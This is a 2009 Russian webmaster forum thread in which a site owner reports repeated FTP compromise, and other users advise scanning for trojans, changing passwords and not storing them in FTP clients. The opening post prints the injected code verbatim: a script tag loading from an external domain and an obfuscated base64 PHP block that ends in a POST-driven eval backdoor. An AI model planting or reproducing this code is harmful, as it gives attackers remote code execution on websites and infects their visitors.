взломали Ftp доступ (((( - SEO форум MaulTalk.com

взломали Ftp доступ ((((

Опции

shtrih

Topic Starter сообщение

12.10.2009, 19:01; Ответить: shtrih

Сообщение #11

Бывалый

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:

6

Здравствуйте!
Каким то ... уже третий раз мой ftp доступ взламывают и меняют все index.php , index.html
Как защитить себя от этих дебилов? Стоит касперский у меня, но всёровно взламывают.

дописывают строчки в индексы:

1 <script src=http://avtograd-2007.com.ua/images/izumof.php ></script>
2 <?php eval(base64_decode('aWYoIWlzc2V0KCRlejBpbjEpKXtmdW5jdGlvbiBlejBpbigkcyl7aWYocHJlZ19tYXRjaF9hbGwo
JyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNv
d
W50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hX
F
tcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJy
w
kdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGF
y
Q29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgk
d
iwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAk
dilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxz
K
jpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZ
W
dfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNt
bHdkQ0J6Y21NOWFIUjBjRG92TDJGMmRHOW5jbUZrTFRJd01EY3VZMjl0TG5WaEwybHRZV2RsY3k5cGVu
V
nRiMll1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkc
z
1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLC
c
sYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGV6MGluMigkYSwkYiwkYywkZCl7Z2xvYmFsICR
l
ejBpbjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGV6MGluMSkpY2FsbF91c2VyX2Z1bmMo
J
GV6MGluMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9J
H
ZbJ25hbWUnXSk9PSdlejBpbicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZW
x
zZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2Nv
bnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdlejBpbicpO2ZvcigkaT0wOyRpPGNvdW50
K
CRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRlejBpbmw9KCgkY
T
1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2V6MGluMicpKSE9J2V6MGluMicpPyRhOjA7ZXZhbChiYXNlNjRfZG
V
jb2RlKCRfUE9TVFsnZSddKSk7')); ?>

0

Ответить с цитированием данного сообщения

Niken Niken 12.10.2009, 19:37; Сообщений: 185 Поблагодарили: 56 раз Репутация: 11 Просмотр профиля	12.10.2009, 19:37; Ответить: Niken Сообщение #12
Участник Группа: User Сообщений: 185 Регистрация: 19.4.2009 Из: Кемерово Поблагодарили: 56 раз Репутация: 11	Еще раз напишу свою инструкцию,у же раза три её печатал, но обычно помогает) Вот, действующий алгоритм) Советую делать в такой последовательности: 1. проверяем весь компьютер на вирусы, желательна связка KIS + антитроянская прога, всё, конечно, с самыми новыми базами. Удаляем найденные трояны, если не нашлись, значит, скорее всего плохо искали)) 2. меняем пароли на фтп и админку 3. чистим все файлы html и php, в первую очередь index, но может быть и в других, желательно проверить все( На будущее пользуемся только защищенным соединением, пароли лучше в TotalCommandere не хранить, а если храните, лучше делать как я - ко всем паролям в конце дописываю один символ, т.е. при входе просто добавляю его у сохранённому паролю,и запоминать не приходится, и более менее безопасно) -------------------- Семейный отдых в Анапе, Витязево

zup120 zup120 12.10.2009, 19:49; Сообщений: 490 Поблагодарили: 53 раза Репутация: 10 Просмотр профиля	12.10.2009, 19:49; Ответить: zup120 Сообщение #13
Бывалый Группа: User Сообщений: 490 Регистрация: 9.2.2008 Поблагодарили: 53 раза Репутация: 10	Может вирус в кампе? Или может залили шелл в какое то место где вы не видели, и он каждый раз отправляет данные от управления фтп. -------------------- GPS навигаторы Днепропетровск

shtrih Topic Starter shtrihTopic Starter 12.10.2009, 19:54; Сообщений: 459 Поблагодарили: 21 раз Репутация: 6 Просмотр профиля	Topic Starter 12.10.2009, 19:54; Ответить: shtrih Сообщение #14
Бывалый Группа: User Сообщений: 459 Регистрация: 2.4.2008 Из: Питер Поблагодарили: 21 раз Репутация: 6	TotalCommander не пользуюсь. Использую FileZilla Руками врятли мой пароль подобрать можно, так что это дело рук из вне Сижу сейчас и думаю... если нормальный проект замучу то нет никакой горантии что не сломают ((( Взлом ftp этож уголовно наказуемо? что с этим можно сделать? на хостера пожаловатся?

zetx zetx 12.10.2009, 19:57; Сообщений: 211 Поблагодарили: 15 раз Репутация: 8 Просмотр профиля	12.10.2009, 19:57; Ответить: zetx Сообщение #15
Участник Группа: Banned Сообщений: 211 Регистрация: 9.8.2009 Из: Россия Поблагодарили: 15 раз Репутация: 8	(shtrih @ 12.10.2009, 18:54) TotalCommander не пользуюсь. Использую FileZilla Руками врятли мой пароль подобрать можно, так что это дело рук из вне Сижу сейчас и думаю... если нормальный проект замучу то нет никакой горантии что не сломают ((( Взлом ftp этож уголовно наказуемо? что с этим можно сделать? на хостера пожаловатся? Проверь комп на вируса. Если вирус выдернул пароль из Filezilla - то хостер тут не причем.

Niken Niken 12.10.2009, 20:42; Сообщений: 185 Поблагодарили: 56 раз Репутация: 11 Просмотр профиля	12.10.2009, 20:42; Ответить: Niken Сообщение #16
Участник Группа: User Сообщений: 185 Регистрация: 19.4.2009 Из: Кемерово Поблагодарили: 56 раз Репутация: 11	FileZilla вроде тоже хранит пароли незашифрованными, так что ищи вирус на компе, процентов на 80 уверен, что дело в этом -------------------- Семейный отдых в Анапе, Витязево

dexter007 dexter007 12.10.2009, 22:48; Сообщений: 417 Поблагодарили: 102 раза Репутация: 22 Просмотр профиля	12.10.2009, 22:48; Ответить: dexter007 Сообщение #17
Бывалый Группа: User Сообщений: 417 Регистрация: 16.11.2008 Поблагодарили: 102 раза Репутация: 22	Это очень примитивный вирус именно он родимый, в joomla вставляет код во все индекс файлы, включая админские, в вордпрессе модифицирует индексную страницу, а также ряд плагинов. как лечить - убивайте свою фаил зиллу, чистите код сайта, затем меняйте пароли от фтп, сканируйте компъютер ищите заразу, попросите также хостера проверить на вирус. и никогда не храните пароли ни в тотале, ни в зилле, они оттуда крадутся как два пальца об асфальт Сообщение отредактировал dexter007 - 12.10.2009, 22:49

kot003 kot003 13.10.2009, 0:33; Сообщений: 76 Поблагодарили: 18 раз Репутация: 1 Просмотр профиля	13.10.2009, 0:33; Ответить: kot003 Сообщение #18
Частый гость Группа: User Сообщений: 76 Регистрация: 14.6.2009 Из: Северная пальмира Поблагодарили: 18 раз Репутация: 1	Обновляйте вовремя движок, это может быть банальный шелл. -------------------- select * from my.life

Ice_man Ice_man 13.10.2009, 1:03; Сообщений: 235 Поблагодарили: 46 раз Репутация: 3 Просмотр профиля	13.10.2009, 1:03; Ответить: Ice_man Сообщение #19
Участник Группа: User Сообщений: 235 Регистрация: 17.8.2009 Из: Киев Поблагодарили: 46 раз Репутация: 3	(White_Lad @ 12.10.2009, 18:36) по маске ... если динамический ... меняются же только последние цыферки... ?! не так ? Смотря как настроен DHCP. Если выдает свободный ай-пи из подсети с маской, к примеру, 255.255.255.0, - Да, будет менятся только последняя цифра.Если настроен как-то иначе- по другому будет.

agentvini agentvini 13.10.2009, 1:26; Сообщений: 1076 Поблагодарили: 235 раз Репутация: 39 Просмотр профиля	13.10.2009, 1:26; Ответить: agentvini Сообщение #20
wir werden alle sterben Группа: Active User Сообщений: 1076 Регистрация: 27.5.2008 Из: Москва Поблагодарили: 235 раз Репутация: 39	в ц панели глянь логи соединений по фтп, а так же логи ошибок. Могли уже скрипт для доступа залить -------------------- Профессиональная разработка сайтов на MODx реализуем все ваши идеи качественно и быстро цена от 500$ (skype sanche.s)

Danko Danko 13.10.2009, 1:30; Сообщений: 206 Поблагодарили: 45 раз Репутация: 12 Просмотр профиля	13.10.2009, 1:30; Ответить: Danko Сообщение #21
Участник Группа: User Сообщений: 206 Регистрация: 14.9.2008 Из: Планета Земля Поблагодарили: 45 раз Репутация: 12	Никогда не сохраняйте пароли в программа типа Тотала. Оттуда их замечательно ворует различный софт...

« Предыдущая тема · Программная часть · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Выгрузки из KEYS.SO, SPYWORDS.RU, SERPSTAT.COM, AHREFS.COM, MAJESTIC.COM, доступ в SEMRUSH.COM всё в одном месте - экономия времени и денег	28	Germeso	25730	19.10.2019, 21:08 автор: Germeso
Куплю доступ к сервису Linkpad Сбор внешних ссылок	5	Kuzzma	2112	11.8.2019, 22:28 автор: Rybakin
Передам доступ к Ahrefs за 1/3 цены месячной подписки	3	Tutich	2006	2.4.2019, 11:52 автор: Tutich
Куплю доступ к tz.binet.pro tz.binet.pro	0	tehno_music	2922	4.6.2018, 11:45 автор: tehno_music
Куплю доступ к сервисам Пузата	1	absoluteness	2453	17.8.2017, 18:59 автор: Silverspam